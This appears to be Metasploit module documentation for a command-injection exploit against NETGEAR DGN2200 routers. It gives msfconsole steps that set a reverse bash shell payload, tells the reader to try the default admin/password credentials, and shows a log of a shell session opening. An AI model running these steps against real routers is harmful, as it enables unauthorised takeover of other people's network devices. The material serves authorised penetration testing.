## Vulnerable Application

  NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers

## Verification Steps

  1. start `msfconsole`
  2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
  3. `set RHOST 192.168.1.1` `<--- Router IP`
  4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
  5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
  5. `set PAYLOAD cmd/unix/reverse_bash`
  6. `set LHOST 192.168.1.x`
  7. `set LPORT xxxx`
  8. `run`
  9. Get a session

## Options

  **USERNAME**

  The `USERNAME` option sets the username to authenticate the request with.
  The command injection will __not__ succeed if the username and password are not correct.
  The default username for NETGEAR Routers is `admin`. If you don't know the credentials,
  your best bet will be to use the default username and password.
  
  
  **PASSWORD**
  
  The `PASSWORD`options sets the password to authenticate the request with.
  The command injection will __not__ succeed if the username and password are not correct.
  The default password for NETGEAR Routers is `password`. If you don't know the credentials,
  your best bet will be to use the default username and password.
  
## Advanced Options
  
  **HOSTNAME**
  
  The request is went with a `host_name` POST parameter. This option sets this parameter. 
  The default is `www.google.com`. The reason for the parameter is that the file that this
  vulnerability is located in (`dnslookup.cgi`) actually needs a domain to resolve, or else 
  the injection won't work.
  

## Scenarios

  What it should look like against a vulnerable router.

  ```
msf > use exploit/linux/http/netgear_dnslookup_cmd_exec 
msf exploit(netgear_dnslookup_cmd_exec) > options

Module options (exploit/linux/http/netgear_dnslookup_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to authenticate with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME                   yes       Username to authenticate with
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   NETGEAR DDGN2200 Router


msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin
USERNAME => admin
msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password
PASSWORD => password
msf exploit(netgear_dnslookup_cmd_exec) > run

[*] Started reverse TCP double handler on 192.168.1.9:4444 
[+] Router is a NETGEAR router (DGN2200v1)
[*] Sending payload...
[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500
```
  
